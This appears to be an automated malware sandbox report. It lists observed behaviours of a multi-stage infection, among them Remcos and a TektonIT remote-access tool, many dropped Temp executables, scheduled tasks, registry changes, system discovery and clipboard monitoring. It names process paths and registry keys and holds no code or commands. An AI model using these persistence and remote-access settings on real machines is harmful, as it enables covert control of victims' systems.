Browser Information Discovery
Enumerates physical storage devices
Event Triggered Execution: Installer Packages
| Description | Indicator | Process | Target |
| N/A | N/A | C:\Windows\SysWOW64\msiexec.exe | N/A |
Program crash
System Location Discovery: System Language Discovery
| Description | Indicator | Process | Target |
| Key opened | \REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\NLS\Language | C:\Windows\SysWOW64\curl.exe | N/A |
| Key opened | \REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\NLS\Language | C:\Windows\SysWOW64\curl.exe | N/A |
| Key opened | \REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\NLS\Language | C:\Windows\SysWOW64\schtasks.exe | N/A |
| Key opened | \REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\NLS\Language | C:\Users\Admin\AppData\Local\Temp\a\vorpgkadeg.exe | N/A |
| Key opened | \REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\NLS\Language | C:\Windows\SysWOW64\msiexec.exe | N/A |
| Key opened | \REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\NLS\Language | C:\Users\Admin\AppData\Local\Temp\a\yiklfON.exe | N/A |
| Key opened | \REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\NLS\Language | C:\Windows\SysWOW64\tasklist.exe | N/A |
| Key opened | \REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\NLS\Language | C:\Users\Admin\AppData\Local\Temp\a\ScreenUpdateSync.exe | N/A |
| Key opened | \REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\NLS\Language | C:\Users\Admin\AppData\Local\Temp\a\Z9Pp9pM.exe | N/A |
| Key opened | \REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\NLS\Language | C:\Windows\SysWOW64\systeminfo.exe | N/A |
| Key opened | \REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\NLS\Language | C:\Users\Admin\AppData\Local\Temp\a\50to.exe | N/A |
| Key opened | \REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\NLS\Language | C:\Windows\SysWOW64\curl.exe | N/A |
| Key opened | \REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\NLS\Language | C:\Windows\SysWOW64\WScript.exe | N/A |
| Key opened | \REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\NLS\Language | C:\Windows\SysWOW64\cmd.exe | N/A |
| Key opened | \REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\NLS\Language | C:\ProgramData\Remcos\remcos.exe | N/A |
| Key opened | \REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\NLS\Language | C:\Windows\SysWOW64\timeout.exe | N/A |
| Key opened | \REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\NLS\Language | C:\Windows\SysWOW64\cmd.exe | N/A |
| Key opened | \REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\NLS\Language | C:\Users\Admin\AppData\Local\Temp\a\kisloyat.exe | N/A |
| Key opened | \REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\NLS\Language | C:\Users\Admin\AppData\Local\Temp\a\C1J7SVw.exe | N/A |
| Key opened | \REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\NLS\Language | C:\Users\Admin\AppData\Local\Temp\a\M5iFR20.exe | N/A |
| Key opened | \REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\NLS\Language | C:\Users\Admin\AppData\Local\Temp\a\888.exe | N/A |
| Key opened | \REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\NLS\Language | C:\Windows\SysWOW64\reg.exe | N/A |
| Key opened | \REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\NLS\Language | C:\Users\Admin\AppData\Local\Temp\a\jdrgsotrti.exe | N/A |
| Key opened | \REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\NLS\Language | C:\Windows\SysWOW64\cmd.exe | N/A |
| Key opened | \REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\NLS\Language | C:\Windows\SysWOW64\reg.exe | N/A |
| Key opened | \REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\NLS\Language | C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe | N/A |
| Key opened | \REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\NLS\Language | C:\Users\Admin\AppData\Local\Temp\a\piotjhjadkaw.exe | N/A |
| Key opened | \REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\NLS\Language | C:\Users\Admin\AppData\Local\Temp\a\4XYFk9r.exe | N/A |
| Key opened | \REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\NLS\Language | C:\Windows\SysWOW64\systeminfo.exe | N/A |
| Key opened | \REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\NLS\Language | C:\Users\Admin\AppData\Local\Temp\a\W4KLQf7.exe | N/A |
| Key opened | \REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\NLS\Language | C:\Users\Admin\AppData\Local\Temp\7725ce688f\Gxtuum.exe | N/A |
| Key opened | \REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\NLS\Language | C:\Windows\SysWOW64\timeout.exe | N/A |
| Key opened | \REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\NLS\Language | C:\Windows\SysWOW64\curl.exe | N/A |
| Key opened | \REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\NLS\Language | C:\Users\Admin\AppData\Local\Temp\a\RMX.exe | N/A |
| Key opened | \REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\NLS\Language | C:\Users\Admin\AppData\Local\Temp\a\random.exe | N/A |
| Key opened | \REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\NLS\Language | C:\Users\Admin\AppData\Local\Temp\a\Dynpvoy.exe | N/A |
| Key opened | \REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\NLS\Language | C:\Windows\SysWOW64\regedit.exe | N/A |
| Key opened | \REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\NLS\Language | C:\Windows\SysWOW64\cmd.exe | N/A |
| Key opened | \REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\NLS\Language | C:\Windows\SysWOW64\cmd.exe | N/A |
| Key opened | \REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\NLS\Language | C:\Users\Admin\AppData\Local\Temp\a\9feskIx.exe | N/A |
| Key opened | \REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\NLS\Language | C:\Users\Admin\AppData\Local\Temp\a\alexshlu.exe | N/A |
| Key opened | \REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\NLS\Language | C:\Users\Admin\AppData\Local\Temp\a\vovdawdrg.exe | N/A |
| Key opened | \REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\NLS\Language | C:\Windows\SysWOW64\cmd.exe | N/A |
| Key opened | \REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\NLS\Language | C:\Windows\SysWOW64\cmd.exe | N/A |
| Key opened | \REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\NLS\Language | C:\Windows\SysWOW64\cmd.exe | N/A |
| Key opened | \REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\NLS\Language | C:\Users\Admin\AppData\Local\Temp\a\krgawdtyjawd.exe | N/A |
| Key opened | \REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\NLS\Language | C:\Users\Admin\AppData\Local\Temp\a\kisteruop.exe | N/A |
| Key opened | \REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\NLS\Language | C:\Users\Admin\AppData\Local\Temp\a\3EUEYgl.exe | N/A |
| Key opened | \REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\NLS\Language | C:\Users\Admin\AppData\Local\Temp\a\Dynpvoy.exe | N/A |
| Key opened | \REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\NLS\Language | C:\Users\Admin\AppData\Local\Temp\7725ce688f\Gxtuum.exe | N/A |
| Key opened | \REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\NLS\Language | C:\Users\Admin\AppData\Local\Temp\a\info.exe | N/A |
| Key opened | \REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\NLS\Language | C:\Windows\SysWOW64\cmd.exe | N/A |
| Key opened | \REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\NLS\Language | C:\Users\Admin\AppData\Local\Temp\7725ce688f\Gxtuum.exe | N/A |
| Key opened | \REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\NLS\Language | C:\Users\Admin\AppData\Local\Temp\a\3EUEYgl.exe | N/A |
| Key opened | \REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\NLS\Language | C:\Windows\SysWOW64\schtasks.exe | N/A |
| Key opened | \REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\NLS\Language | C:\Users\Admin\AppData\Local\Temp\a\yiklfON.exe | N/A |
| Key opened | \REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\NLS\Language | C:\Users\Admin\AppData\Local\Temp\a\alexshlu.exe | N/A |
| Key opened | \REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\NLS\Language | C:\Windows\SysWOW64\cmd.exe | N/A |
| Key opened | \REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\NLS\Language | C:\Windows\SysWOW64\cmd.exe | N/A |
| Key opened | \REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\NLS\Language | C:\Users\Admin\AppData\Local\Temp\a\50.exe | N/A |
| Key opened | \REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\NLS\Language | C:\Windows\SysWOW64\cmd.exe | N/A |
| Key opened | \REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\NLS\Language | C:\Users\Admin\AppData\Local\Temp\a\mfcthased.exe | N/A |
| Key opened | \REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\NLS\Language | C:\Windows\SysWOW64\reg.exe | N/A |
| Key opened | \REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\NLS\Language | C:\Windows\SysWOW64\cmd.exe | N/A |
System Network Configuration Discovery: Internet Connection Discovery
System Network Configuration Discovery: Wi-Fi Discovery
| Description | Indicator | Process | Target |
| N/A | N/A | C:\Windows\system32\cmd.exe | N/A |
| N/A | N/A | C:\Windows\system32\netsh.exe | N/A |
Checks processor information in registry
| Description | Indicator | Process | Target |
| Key value queried | \REGISTRY\MACHINE\HARDWARE\DESCRIPTION\System\CentralProcessor\0\ProcessorNameString | C:\Users\Admin\AppData\Local\Temp\a\3EUEYgl.exe | N/A |
| Key queried | \REGISTRY\MACHINE\HARDWARE\DESCRIPTION\System\CentralProcessor\0 | C:\Windows\system32\wbem\wmiprvse.exe | N/A |
| Key value queried | \REGISTRY\MACHINE\HARDWARE\DESCRIPTION\System\CentralProcessor\0\ProcessorNameString | N/A | N/A |
| Key opened | \REGISTRY\MACHINE\Hardware\Description\System\CentralProcessor\0 | C:\Windows\system32\WerFault.exe | N/A |
| Key value queried | \REGISTRY\MACHINE\HARDWARE\DESCRIPTION\System\CentralProcessor\0\~MHz | C:\Windows\system32\WerFault.exe | N/A |
| Key value queried | \REGISTRY\MACHINE\HARDWARE\DESCRIPTION\System\CentralProcessor\0\ProcessorNameString | C:\Users\Admin\AppData\Local\Temp\a\3EUEYgl.exe | N/A |
| Key opened | \REGISTRY\MACHINE\Hardware\Description\System\CentralProcessor\0 | N/A | N/A |
| Key value queried | \REGISTRY\MACHINE\HARDWARE\DESCRIPTION\System\CentralProcessor\0\~MHz | N/A | N/A |
| Key value queried | \REGISTRY\MACHINE\HARDWARE\DESCRIPTION\System\CentralProcessor\0\ProcessorNameString | C:\Windows\system32\WerFault.exe | N/A |
| Key opened | \REGISTRY\MACHINE\HARDWARE\DESCRIPTION\System\CentralProcessor\0 | C:\Windows\system32\wbem\wmiprvse.exe | N/A |
| Key opened | \REGISTRY\MACHINE\HARDWARE\Description\System\CentralProcessor\0 | C:\Users\Admin\AppData\Local\Temp\a\4XYFk9r.exe | N/A |
| Key opened | \REGISTRY\MACHINE\HARDWARE\DESCRIPTION\System\CentralProcessor\0 | C:\Users\Admin\AppData\Local\Temp\a\3EUEYgl.exe | N/A |
| Key value queried | \REGISTRY\MACHINE\HARDWARE\DESCRIPTION\System\CentralProcessor\0\Component Information | C:\Windows\system32\wbem\wmiprvse.exe | N/A |
| Key value queried | \REGISTRY\MACHINE\HARDWARE\DESCRIPTION\System\CentralProcessor\0\Identifier | C:\Windows\system32\wbem\wmiprvse.exe | N/A |
| Key value queried | \REGISTRY\MACHINE\HARDWARE\DESCRIPTION\System\CentralProcessor\0\~MHz | C:\Windows\system32\WerFault.exe | N/A |
| Key opened | \REGISTRY\MACHINE\HARDWARE\DESCRIPTION\System\CentralProcessor\0 | C:\Users\Admin\AppData\Local\Temp\a\3EUEYgl.exe | N/A |
| Key security queried | \REGISTRY\MACHINE\HARDWARE\DESCRIPTION\System\CentralProcessor\0 | C:\Windows\system32\wbem\wmiprvse.exe | N/A |
| Key value queried | \REGISTRY\MACHINE\HARDWARE\DESCRIPTION\System\CentralProcessor\0\ProcessorNameString | C:\Windows\system32\wbem\wmiprvse.exe | N/A |
| Key opened | \REGISTRY\MACHINE\Hardware\Description\System\CentralProcessor\0 | C:\Windows\system32\WerFault.exe | N/A |
| Key value queried | \REGISTRY\MACHINE\HARDWARE\DESCRIPTION\System\CentralProcessor\0\ProcessorNameString | C:\Windows\system32\WerFault.exe | N/A |
| Key value queried | \REGISTRY\MACHINE\HARDWARE\DESCRIPTION\System\CentralProcessor\0\Identifier | C:\Users\Admin\AppData\Local\Temp\a\4XYFk9r.exe | N/A |
Delays execution with timeout.exe
| Description | Indicator | Process | Target |
| N/A | N/A | C:\Windows\SysWOW64\timeout.exe | N/A |
| N/A | N/A | C:\Windows\SysWOW64\timeout.exe | N/A |
Enumerates system info in registry
| Description | Indicator | Process | Target |
| Key opened | \REGISTRY\MACHINE\Hardware\Description\System\BIOS | C:\Windows\system32\WerFault.exe | N/A |
| Key value queried | \REGISTRY\MACHINE\HARDWARE\DESCRIPTION\System\BIOS\SystemSKU | C:\Windows\system32\WerFault.exe | N/A |
| Key opened | \REGISTRY\MACHINE\Hardware\Description\System\BIOS | N/A | N/A |
| Key value queried | \REGISTRY\MACHINE\HARDWARE\DESCRIPTION\System\BIOS\SystemSKU | N/A | N/A |
| Key value queried | \REGISTRY\MACHINE\HARDWARE\DESCRIPTION\System\Identifier | C:\Windows\system32\wbem\wmiprvse.exe | N/A |
| Key opened | \REGISTRY\MACHINE\Hardware\Description\System\BIOS | C:\Windows\system32\WerFault.exe | N/A |
| Key value queried | \REGISTRY\MACHINE\HARDWARE\DESCRIPTION\System\BIOS\SystemSKU | C:\Windows\system32\WerFault.exe | N/A |
Gathers system information
| Description | Indicator | Process | Target |
| N/A | N/A | C:\Windows\SysWOW64\systeminfo.exe | N/A |
| N/A | N/A | C:\Windows\SysWOW64\systeminfo.exe | N/A |
| N/A | N/A | C:\Windows\system32\systeminfo.exe | N/A |
GoLang User-Agent
| Description | Indicator | Process | Target |
| HTTP User-Agent header | Go-http-client/1.1 | N/A | N/A |
Kills process with taskkill
| Description | Indicator | Process | Target |
| N/A | N/A | C:\Windows\System32\taskkill.exe | N/A |
Modifies data under HKEY_USERS
| Description | Indicator | Process | Target |
| Key created | \REGISTRY\USER\.DEFAULT\Software\Microsoft\SystemCertificates\Disallowed\CRLs | C:\Windows\System32\WindowsPowerShell\v1.0\powershell.EXE | N/A |
| Key created | \REGISTRY\USER\.DEFAULT\Software\Microsoft\SystemCertificates\TrustedPeople\CRLs | C:\Windows\System32\WindowsPowerShell\v1.0\powershell.EXE | N/A |
| Set value (str) | \REGISTRY\USER\.DEFAULT\Software\TektonIT\Remote Manipulator System\Host\Parameters\FUSClientPath = "C:\\Windows\\SysWOW64\\ruts\\rfusclient.exe" | C:\Windows\SysWOW64\ruts\rutserv.exe | N/A |
| Key created | \REGISTRY\USER\.DEFAULT\Software\Microsoft\SystemCertificates\SmartCardRoot\CRLs | C:\Windows\SysWOW64\ruts\rutserv.exe | N/A |
| Key created | \REGISTRY\USER\.DEFAULT\Software\Microsoft\SystemCertificates\trust | C:\Windows\SysWOW64\ruts\rutserv.exe | N/A |
| Key created | \REGISTRY\USER\.DEFAULT\Software\Policies\Microsoft\SystemCertificates\TrustedPeople\CTLs | C:\Windows\SysWOW64\ruts\rutserv.exe | N/A |
| Set value (data) | \REGISTRY\USER\.DEFAULT\Software\TektonIT\Remote Manipulator System\Host\Parameters\InternetId = (binary value omitted from report) | C:\Windows\SysWOW64\regedit.exe | N/A |
| Key created | \REGISTRY\USER\.DEFAULT\Software\Policies\Microsoft\SystemCertificates\Disallowed\CTLs | C:\Windows\System32\WindowsPowerShell\v1.0\powershell.EXE | N/A |
| Key created | \REGISTRY\USER\.DEFAULT\Software\Microsoft\SystemCertificates\SmartCardRoot\Certificates | C:\Windows\System32\WindowsPowerShell\v1.0\powershell.EXE | N/A |
| Key created | \REGISTRY\USER\.DEFAULT\Software\Policies\Microsoft\SystemCertificates\Disallowed\CTLs | C:\Windows\SysWOW64\ruts\rutserv.exe | N/A |
| Key created | \REGISTRY\USER\.DEFAULT\Software\Microsoft\SystemCertificates\TrustedPeople\CRLs | C:\Windows\SysWOW64\ruts\rutserv.exe | N/A |
| Key created | \REGISTRY\USER\.DEFAULT\Software\Policies\Microsoft\SystemCertificates\CA\CRLs | C:\Windows\System32\WindowsPowerShell\v1.0\powershell.EXE | N/A |
| Key created | \REGISTRY\USER\.DEFAULT\Software\TektonIT\Remote Manipulator System\Host\Parameters | C:\Windows\SysWOW64\regedit.exe | N/A |
| Key created | \REGISTRY\USER\.DEFAULT\Software\Policies\Microsoft\SystemCertificates\TrustedPeople\Certificates | C:\Windows\SysWOW64\ruts\rutserv.exe | N/A |
| Key created | \REGISTRY\USER\.DEFAULT\Software\Microsoft\SystemCertificates\SmartCardRoot | C:\Windows\System32\WindowsPowerShell\v1.0\powershell.EXE | N/A |
| Set value (data) | \REGISTRY\USER\.DEFAULT\Software\TektonIT\Remote Manipulator System\Host\Parameters\Security = (binary value omitted from report) | C:\Windows\SysWOW64\regedit.exe | N/A |
| Key created | \REGISTRY\USER\.DEFAULT\Software\Microsoft\SystemCertificates\SmartCardRoot | C:\Windows\SysWOW64\ruts\rutserv.exe | N/A |
| Key created | \REGISTRY\USER\.DEFAULT\Software\Microsoft\SystemCertificates\TrustedPeople\CTLs | C:\Windows\SysWOW64\ruts\rutserv.exe | N/A |
| Key created | \REGISTRY\USER\.DEFAULT\Software\Microsoft\SystemCertificates\SmartCardRoot\Certificates | C:\Windows\System32\WindowsPowerShell\v1.0\powershell.EXE | N/A |
| Key created | \REGISTRY\USER\.DEFAULT\Software\Policies\Microsoft\SystemCertificates\trust\Certificates | C:\Windows\System32\WindowsPowerShell\v1.0\powershell.EXE | N/A |
| Key created | \REGISTRY\USER\.DEFAULT\Software\Policies\Microsoft\SystemCertificates\trust\CTLs | C:\Windows\SysWOW64\ruts\rutserv.exe | N/A |
| Key created | \REGISTRY\USER\S-1-5-19\Software\Microsoft\Windows\CurrentVersion\Uninstall | C:\Windows\system32\svchost.exe | N/A |
| Key created | \REGISTRY\USER\.DEFAULT\Software\Microsoft\SystemCertificates\CA\CTLs | C:\Windows\SysWOW64\ruts\rutserv.exe | N/A |
| Key created | \REGISTRY\USER\.DEFAULT\Software\Microsoft\SystemCertificates\Disallowed\CTLs | C:\Windows\SysWOW64\ruts\rutserv.exe | N/A |
| Key created | \REGISTRY\USER\.DEFAULT\Software\Microsoft\SystemCertificates\trust\CRLs | C:\Windows\SysWOW64\ruts\rutserv.exe | N/A |
| Key created | \REGISTRY\USER\.DEFAULT\Software\Policies\Microsoft\SystemCertificates\CA | C:\Windows\System32\WindowsPowerShell\v1.0\powershell.EXE | N/A |
| Key created | \REGISTRY\USER\.DEFAULT\Software\Policies\Microsoft\SystemCertificates\trust\CRLs | C:\Windows\System32\WindowsPowerShell\v1.0\powershell.EXE | N/A |
| Key created | \REGISTRY\USER\.DEFAULT\Software\Microsoft\SystemCertificates\CA | C:\Windows\System32\WindowsPowerShell\v1.0\powershell.EXE | N/A |
| Key created | \REGISTRY\USER\.DEFAULT\Software\Microsoft\SystemCertificates\Disallowed | C:\Windows\System32\WindowsPowerShell\v1.0\powershell.EXE | N/A |
| Key created | \REGISTRY\USER\.DEFAULT\Software\Policies\Microsoft\SystemCertificates\TrustedPeople\CRLs | C:\Windows\System32\WindowsPowerShell\v1.0\powershell.EXE | N/A |
| Set value (int) | \REGISTRY\USER\.DEFAULT\Software\Microsoft\Windows\CurrentVersion\Internet Settings\ZoneMap\AutoDetect = "0" | C:\Windows\System32\dllhost.exe | N/A |
| Set value (data) | \REGISTRY\USER\.DEFAULT\Software\TektonIT\Remote Manipulator System\Host\Parameters\Certificates = (binary value omitted from report) | C:\Windows\SysWOW64\regedit.exe | N/A |
| Key created | \REGISTRY\USER\.DEFAULT\Software\Policies\Microsoft\SystemCertificates\Disallowed | C:\Windows\SysWOW64\ruts\rutserv.exe | N/A |
| Key created | \REGISTRY\USER\.DEFAULT\Software\Microsoft\SystemCertificates\trust\CTLs | C:\Windows\SysWOW64\ruts\rutserv.exe | N/A |
| Key created | \REGISTRY\USER\.DEFAULT\Software\Microsoft\SystemCertificates\CA\Certificates | C:\Windows\System32\WindowsPowerShell\v1.0\powershell.EXE | N/A |
| Key created | \REGISTRY\USER\.DEFAULT\Software\Policies\Microsoft\SystemCertificates\trust\CTLs | C:\Windows\System32\WindowsPowerShell\v1.0\powershell.EXE | N/A |
| Key created | \REGISTRY\USER\.DEFAULT\Software\Microsoft\SystemCertificates\Root\Certificates | C:\Windows\SysWOW64\ruts\rutserv.exe | N/A |
| Key created | \REGISTRY\USER\.DEFAULT\Software\Policies\Microsoft\SystemCertificates\TrustedPeople\CRLs | C:\Windows\SysWOW64\ruts\rutserv.exe | N/A |
| Key created | \REGISTRY\USER\.DEFAULT\Software\Microsoft\SystemCertificates\TrustedPeople | C:\Windows\SysWOW64\ruts\rutserv.exe | N/A |
| Set value (str) | \REGISTRY\USER\.DEFAULT\Software\TektonIT\Remote Manipulator System\Host\Parameters\FUSClientPath = "C:\\Windows\\SysWOW64\\ruts\\rfusclient.exe" | C:\Windows\SysWOW64\regedit.exe | N/A |
| Key created | \REGISTRY\USER\.DEFAULT\Software\Policies\Microsoft\SystemCertificates\Disallowed | C:\Windows\System32\WindowsPowerShell\v1.0\powershell.EXE | N/A |
| Key created | \REGISTRY\USER\.DEFAULT\Software\Policies\Microsoft\SystemCertificates\TrustedPeople\Certificates | C:\Windows\System32\WindowsPowerShell\v1.0\powershell.EXE | N/A |
| Key created | \REGISTRY\USER\.DEFAULT\Software\Microsoft\Windows\CurrentVersion\WinTrust\Trust Providers\Software Publishing | C:\Windows\System32\WindowsPowerShell\v1.0\powershell.EXE | N/A |
| Key created | \REGISTRY\USER\.DEFAULT\Software\Microsoft\SystemCertificates\Disallowed\CRLs | C:\Windows\SysWOW64\ruts\rutserv.exe | N/A |
| Key created | \REGISTRY\USER\.DEFAULT\Software\Policies\Microsoft\SystemCertificates\CA\CTLs | C:\Windows\System32\WindowsPowerShell\v1.0\powershell.EXE | N/A |
| Key created | \REGISTRY\USER\.DEFAULT\Software\Microsoft\Windows\CurrentVersion\Internet Settings\ZoneMap\ | C:\Windows\System32\dllhost.exe | N/A |
| Set value (int) | \REGISTRY\USER\.DEFAULT\Software\Microsoft\Windows\CurrentVersion\Internet Settings\ZoneMap\UNCAsIntranet = "1" | C:\Windows\System32\dllhost.exe | N/A |
| Key created | \REGISTRY\USER\.DEFAULT\Software\Policies\Microsoft\SystemCertificates\trust\CRLs | C:\Windows\System32\WindowsPowerShell\v1.0\powershell.EXE | N/A |
| Key created | \REGISTRY\USER\.DEFAULT\Software\Policies\Microsoft\SystemCertificates\trust\CRLs | C:\Windows\SysWOW64\ruts\rutserv.exe | N/A |
| Key created | \REGISTRY\USER\.DEFAULT\Software\Policies\Microsoft\SystemCertificates\CA\CTLs | C:\Windows\SysWOW64\ruts\rutserv.exe | N/A |
| Key created | \REGISTRY\USER\.DEFAULT\Software\Microsoft\SystemCertificates\Root | C:\Windows\System32\WindowsPowerShell\v1.0\powershell.EXE | N/A |
| Set value (int) | \REGISTRY\USER\.DEFAULT\Software\Microsoft\Windows\CurrentVersion\Internet Settings\ZoneMap\IntranetName = "1" | C:\Windows\System32\dllhost.exe | N/A |
| Set value (str) | \REGISTRY\USER\.DEFAULT\Software\Classes\Local Settings\MuiCache\26\52C64B7E\@C:\Windows\system32\prnfldr.dll,-8036 = "Printers" | C:\Windows\SysWOW64\ruts\rutserv.exe | N/A |
| Key created | \REGISTRY\USER\.DEFAULT\Software\Policies\Microsoft\SystemCertificates\CA\Certificates | C:\Windows\System32\WindowsPowerShell\v1.0\powershell.EXE | N/A |
| Key created | \REGISTRY\USER\.DEFAULT\Software\Policies\Microsoft\SystemCertificates\TrustedPeople\CTLs | C:\Windows\System32\WindowsPowerShell\v1.0\powershell.EXE | N/A |
| Key created | \REGISTRY\USER\.DEFAULT\Software\Microsoft\SystemCertificates\Disallowed\Certificates | C:\Windows\System32\WindowsPowerShell\v1.0\powershell.EXE | N/A |
| Key created | \REGISTRY\USER\.DEFAULT\Software\Microsoft\SystemCertificates\TrustedPeople\CRLs | C:\Windows\System32\WindowsPowerShell\v1.0\powershell.EXE | N/A |
| Key created | \REGISTRY\USER\.DEFAULT\Software\Policies\Microsoft\SystemCertificates\TrustedPeople\CRLs | C:\Windows\System32\WindowsPowerShell\v1.0\powershell.EXE | N/A |
| Key created | \REGISTRY\USER\.DEFAULT\Software\Policies\Microsoft\SystemCertificates\CA | C:\Windows\System32\WindowsPowerShell\v1.0\powershell.EXE | N/A |
| Key created | \REGISTRY\USER\.DEFAULT\Software\Microsoft\SystemCertificates\Root\CTLs | C:\Windows\System32\WindowsPowerShell\v1.0\powershell.EXE | N/A |
| Key created | \REGISTRY\USER\.DEFAULT\Software\Microsoft\SystemCertificates\Root | C:\Windows\SysWOW64\ruts\rutserv.exe | N/A |
| Key created | \REGISTRY\USER\.DEFAULT\Software\Policies\Microsoft\SystemCertificates\CA\Certificates | C:\Windows\System32\WindowsPowerShell\v1.0\powershell.EXE | N/A |
| Key created | \REGISTRY\USER\.DEFAULT\Software\Microsoft\SystemCertificates\CA\CRLs | C:\Windows\System32\WindowsPowerShell\v1.0\powershell.EXE | N/A |
| Key created | \REGISTRY\USER\.DEFAULT\Software\Policies\Microsoft\SystemCertificates\CA\CRLs | C:\Windows\System32\WindowsPowerShell\v1.0\powershell.EXE | N/A |
Modifies registry class
| Description | Indicator | Process | Target |
| Key created | \REGISTRY\USER\S-1-5-21-3227495264-2217614367-4027411560-1000_Classes\Local Settings | C:\Users\Admin\AppData\Local\Temp\a\RMX.exe | N/A |
Modifies registry key
| Description | Indicator | Process | Target |
| N/A | N/A | C:\Windows\SysWOW64\reg.exe | N/A |
| N/A | N/A | C:\Windows\SysWOW64\reg.exe | N/A |
Runs .reg file with regedit
| Description | Indicator | Process | Target |
| N/A | N/A | C:\Windows\SysWOW64\regedit.exe | N/A |
Runs ping.exe
| Description | Indicator | Process | Target |
| N/A | N/A | C:\Windows\system32\PING.EXE | N/A |
| N/A | N/A | C:\Windows\system32\PING.EXE | N/A |
| N/A | N/A | C:\Windows\system32\PING.EXE | N/A |
| N/A | N/A | C:\Windows\system32\PING.EXE | N/A |
| N/A | N/A | C:\Windows\system32\PING.EXE | N/A |
| N/A | N/A | C:\Windows\system32\PING.EXE | N/A |
| N/A | N/A | C:\Windows\system32\PING.EXE | N/A |
| N/A | N/A | C:\Windows\system32\PING.EXE | N/A |
| N/A | N/A | C:\Windows\system32\PING.EXE | N/A |
Scheduled Task/Job: Scheduled Task
| Description | Indicator | Process | Target |
| N/A | N/A | C:\Windows\SysWOW64\schtasks.exe | N/A |
| N/A | N/A | C:\Windows\SYSTEM32\schtasks.exe | N/A |
| N/A | N/A | C:\Windows\System32\schtasks.exe | N/A |
| N/A | N/A | C:\Windows\System32\schtasks.exe | N/A |
| N/A | N/A | C:\Windows\SYSTEM32\schtasks.exe | N/A |
| N/A | N/A | C:\Windows\SYSTEM32\schtasks.exe | N/A |
| N/A | N/A | C:\Windows\SYSTEM32\schtasks.exe | N/A |
| N/A | N/A | C:\Windows\SYSTEM32\schtasks.exe | N/A |
| N/A | N/A | C:\Windows\SYSTEM32\schtasks.exe | N/A |
| N/A | N/A | C:\Windows\SYSTEM32\schtasks.exe | N/A |
| N/A | N/A | C:\Windows\SYSTEM32\schtasks.exe | N/A |
| N/A | N/A | C:\Windows\SysWOW64\schtasks.exe | N/A |
| N/A | N/A | C:\Windows\SYSTEM32\schtasks.exe | N/A |
| N/A | N/A | C:\Windows\System32\schtasks.exe | N/A |
| N/A | N/A | C:\Windows\SYSTEM32\schtasks.exe | N/A |
Suspicious behavior: AddClipboardFormatListener
| Description | Indicator | Process | Target |
| N/A | N/A | C:\Users\Admin\AppData\Local\Temp\a\9feskIx.exe | N/A |
Suspicious behavior: EnumeratesProcesses
Suspicious behavior: MapViewOfSection
| Description | Indicator | Process | Target |
| N/A | N/A | C:\ProgramData\Remcos\remcos.exe | N/A |
Suspicious use of AdjustPrivilegeToken
Suspicious use of FindShellTrayWindow
| Description | Indicator | Process | Target |
| N/A | N/A | C:\Users\Admin\AppData\Local\Temp\a\M5iFR20.exe | N/A |
| N/A | N/A | C:\Users\Admin\AppData\Local\Temp\a\M5iFR20.exe | N/A |
| N/A | N/A | C:\Users\Admin\AppData\Local\Temp\a\M5iFR20.exe | N/A |
| N/A | N/A | C:\Windows\System32\dllhost.exe | N/A |
| N/A | N/A | C:\Windows\explorer.exe | N/A |
| N/A | N/A | C:\Windows\SysWOW64\msiexec.exe | N/A |
